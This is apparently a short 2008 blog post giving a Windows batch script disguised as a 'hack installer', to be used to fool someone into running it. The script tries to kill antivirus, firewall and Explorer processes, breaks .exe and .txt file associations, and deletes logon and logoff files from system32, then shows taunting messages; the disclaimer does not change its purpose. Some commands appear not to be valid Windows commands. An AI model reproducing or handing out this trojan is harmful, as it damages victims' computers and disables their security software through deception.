Fool Someone Into Thinking That He Is Installing a Hack
Saturday, November 29, 2008
Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Hack will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
assoc .exe=txtfile
assoc .txt=mp3file
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
Please Do NOT Try This Yourself!
I will NOT Be Held Responsible for this!
May 7, 2011 at 2:12 PM
I tri3d t0 unlock'r my memory c4rd5 but 1t says c4n n0t op3n LUKS d3vice!